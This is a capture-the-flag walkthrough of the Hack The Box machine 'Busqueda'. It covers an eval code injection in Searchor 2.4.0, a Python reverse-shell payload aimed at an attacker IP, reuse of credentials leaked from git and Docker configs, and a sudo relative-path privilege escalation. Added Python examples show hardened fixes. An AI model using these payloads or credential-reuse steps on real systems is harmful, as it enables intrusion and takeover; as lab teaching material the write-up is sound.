Hack The Box | Busqueda

A classic CTF box that'll make you feel good about cracking it. If you have a tinkerer's mind, hop in.


This is a classic CTF box. You just need a tinkerer's mind, and of course, Burp Suite. If you don't know how to set up Burp or connect to HTB, please search your way through it.

Reconnaissance

The IP of the machine is 10.10.11.208. First, you should always navigate to the IP and see if it's running a web app on the default ports 80 / 443. In this case, it is.

searchor application we need to pwn

ProTip - If you don't see the site when you navigate to the IP, just add the IP to your hosts file. In this case, the entry is going to be 10.10.11.208 searcher.htb. Again, google your way through it if you don't know how.

Let's start an nmap scan while we look into what the web app actually does.

nmap -sC -sV -oA default.ouput searcher.htb

Here's what the flags in the nmap command actually mean. The command is courtesy of Ippsec.Rocks.

  • -sC : Run the default scripts to fingerprint the applications running on the ports.
  • -sV : Enumerate the versions of the applications running on the ports.
  • -oA : Output the data in all available formats (normal, XML and grepable).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Searcher
| http-server-header:
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/2.1.2 Python/3.10.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
nmap output

The output is pretty simple. There are just 2 ports available, 22 and 80, running SSH and a web server respectively, both fairly exploit-free.

The application, however, is what should interest us. It allows you to choose an engine and search for anything. It even auto-redirects you to the chosen engine's website with your search query in the URL.

Your first thought might be Open Redirect or SSRF. Both of those techniques prove pointless in this case. What you should do instead is send the POST request to Burp Suite and fuzz the parameter.

But something even more interesting is there on the site just in plain sight. Look at the footer. "Powered by Flask and Searchor 2.4.0".

Giving away the tech stack behind the website is a definite red flag. And some googling later we find this.

exploit for searchor 2.4.0

In short, they're using the eval function, which one should never use on user input. It takes any string argument and runs it as Python code.
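To make the footer-to-shell jump concrete, here is an added example (not Searchor's own source, whose exact code the write-up only links to) of the same eval pattern beside the lookup-table version that closes the hole; Engine, ENGINES, INJECTION_LOG and _canary are constructed stand-ins, and _canary is a harmless marker that records whether eval ran something it shouldn't have.

```python
"""Searchor-style URL building: attacker text spliced into eval() vs. a plain lookup.

Added example modelled on the eval pattern the write-up points at; it is not Searchor's
own source. Engine, ENGINES, INJECTION_LOG and _canary are constructed stand-ins."""
from urllib.parse import quote_plus

ENGINES = {
    "Amazon": "https://www.amazon.com/s?k=",
    "Google": "https://www.google.com/search?q=",
}

INJECTION_LOG = []  # records that eval executed something it was never meant to

def _canary():
    """Harmless stand-in for whatever expression an attacker would smuggle in."""
    INJECTION_LOG.append("eval ran attacker-supplied code")
    return False

class Engine:
    """Stand-in for the library's engine enum. search() takes an extra option
    (copy_url), which is why a trailing ',' in the query can add an argument."""
    class Amazon:
        @staticmethod
        def search(query, copy_url=False):
            return ENGINES["Amazon"] + quote_plus(query)

    class Google:
        @staticmethod
        def search(query, copy_url=False):
            return ENGINES["Google"] + quote_plus(query)

def build_url_unsafe(engine: str, query: str) -> str:
    # Vulnerable: engine and query become Python source. A query such as
    # "', _canary())#" closes the literal, adds an argument, and comments out
    # the rest, so the injected expression runs before any URL is built.
    return eval(f"Engine.{engine}.search('{query}', copy_url=False)")

def build_url_safe(engine: str, query: str) -> str:
    # Hardened: engine is a dictionary key (nothing from it is evaluated) and
    # query is URL-encoded data, so quotes, commas and '#' are inert.
    try:
        base = ENGINES[engine]
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}") from None
    return base + quote_plus(query)
```

The safe version also rejects a crafted engine name outright, where the eval version would happily evaluate it as an attribute path.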

Looking at the PoC, we can pass additional arguments to the method by placing a "," at the end of the query. Let's try it then.

curl -X POST http://searcher.htb/search -d "engine=Amazon&query=',__import__('os').system('ls /home/'))#"

svc
https://www.amazon.com/s?k=  
code injection successful

SUCCESS! We have code injection. You can either grab the user flag via curl or you can start a shell.

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('YOURIP','YOURPORT'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#

# On another terminal screen, start the listener before sending the above payload
# (YOURPORT must match the port used in the payload)
nc -lvnp YOURPORT
payload for python shell
we have contact

We have a shell. Now we can start the Privilege Escalation process.

Privilege Escalation

A simple ls -a tells us that the current directory is a .git project. So let's see what's inside the config.

cat .git/config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[remote "origin"]
        url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
        remote = origin
        merge = refs/heads/main
config of git directory

Now we have a username, a password, and another host to mess with: gitea.searcher.htb. Make sure you add this to your hosts file or it won't resolve.

The same password can be used to SSH into the server. Now let's see which commands the user is allowed to run as root.

sudo -S -l

Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *
the script you can run with super user privileges

We're allowed to run the system-checkup.py script with sudo; let's see what it lets us do.

 sudo /usr/bin/python3 /opt/scripts/system-checkup.py args
 Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup
usage output of system-checkup.py

docker-ps lets you see all the running containers. docker-inspect lets you dump the config of those containers. Sounds interesting, let's see.

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format={{.Config}} f84a6b33fb5a

--format={f84a6b33fb5a   false false false map[3306/tcp:{} 33060/tcp:{}] false false false [MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF MYSQL_USER=gitea MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh MYSQL_DATABASE=gitea PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin GOSU_VERSION=1.14 MYSQL_MAJOR=8.0 MYSQL_VERSION=8.0.31-1.el8 MYSQL_SHELL_VERSION=8.0.31-1.el8] [mysqld] <nil> false mysql:8 map[/var/lib/mysql:{}]  [docker-entrypoint.sh] false  [] map[com.docker.compose.config-hash:1b3f25a702c351e42b82c1867f5761829ada67262ed4ab55276e50538c54792b com.docker.compose.container-number:1 com.docker.compose.oneoff:False com.docker.compose.project:docker com.docker.compose.project.config_files:docker-compose.yml com.docker.compose.project.working_dir:/root/scripts/docker com.docker.compose.service:db com.docker.compose.version:1.29.2]  <nil> []}
the output for running the docker-inspect

Now we have more usernames and passwords. You can try to SSH into the system with these passwords, but it won't work. So let's go to gitea.searcher.htb.

Unsurprisingly, it's running a Gitea server. We already have credentials to log in as "cody". Once logged in, you can see there's another account called Administrator. Rather than looking for a way to exploit yet another web app, let's try one of the usernames and passwords we found to log in as Administrator. Spoiler alert: it worked.

Now we can see the source code for the system-checkup.py script in one of Admin's repos.

See the mistake here?

system-checkup.py script's source code

When you run the script with the full-checkup flag, it'll look for a file called full-checkup.sh in whatever directory you're currently in.

So the next steps are pretty simple: go to your $HOME directory and create a file called full-checkup.sh

#!/bin/sh
cat /root/root.txt

and run the full-checkup flag. This will print out the root flag.

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

7486cf3edf89e3cc5b4c************
Getting Root Flag
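The relative-path lookup is the whole privilege escalation, so here is an added example (not the box's own /opt/scripts/system-checkup.py, whose source the write-up only shows as an image) of that lookup beside a hardened version that pins the helper to the privileged script's own directory and refuses anything that is a symlink, owned by someone else, or group/world writable. demo() exercises each case in a throwaway directory; it checks against the current user's uid there, where a real deployment would require root (0).

```python
"""Hardening the full-checkup step: never find a root-executed helper via the caller's cwd.
Added example, not the box's /opt/scripts/system-checkup.py; the weak function is the lookup
the write-up describes, the hardened one pins the helper and checks it before running it."""
import stat
import subprocess
import tempfile
from pathlib import Path

def run_full_checkup_weak() -> subprocess.CompletedProcess:
    # Relative path: under sudo the cwd is the invoking user's, so they pick what runs as root.
    return subprocess.run(["/bin/sh", "./full-checkup.sh"], capture_output=True, text=True)

def trusted_helper(path: Path, owner_uid: int = 0) -> Path:
    """Accept only a non-symlink regular file owned by owner_uid with no group/world write."""
    st = path.lstat()  # lstat: a symlink planted at the helper's path is rejected, not followed
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError(f"{path}: not a regular file")
    if st.st_uid != owner_uid:
        raise PermissionError(f"{path}: owned by uid {st.st_uid}, expected {owner_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError(f"{path}: writable by group or others")
    return path

def run_full_checkup_hardened(script_dir: Path, owner_uid: int = 0) -> subprocess.CompletedProcess:
    # script_dir is the privileged script's own directory (/opt/scripts on the box), never cwd.
    # Running the helper through sh also keeps this demo working on a noexec /tmp.
    helper = trusted_helper(script_dir / "full-checkup.sh", owner_uid)
    return subprocess.run(["/bin/sh", str(helper)], capture_output=True, text=True)

def _rejected(script_dir: Path, owner_uid: int) -> bool:
    try:
        run_full_checkup_hardened(script_dir, owner_uid)
        return False
    except PermissionError:
        return True

def demo() -> dict:
    with tempfile.TemporaryDirectory() as d:
        helper = Path(d) / "full-checkup.sh"
        helper.write_text("#!/bin/sh\necho checkup-ok\n")
        helper.chmod(0o755)
        out, me = {}, helper.stat().st_uid          # stand-in for uid 0 in a real deployment
        out["owned_0755"] = run_full_checkup_hardened(Path(d), me).stdout.strip()
        out["wrong_owner"] = _rejected(Path(d), me + 1)
        helper.chmod(0o777)                         # what a user-planted helper amounts to
        out["world_writable"] = _rejected(Path(d), me)
        helper.unlink()
        helper.symlink_to("/bin/sh")
        out["symlink"] = _rejected(Path(d), me)
    return out
```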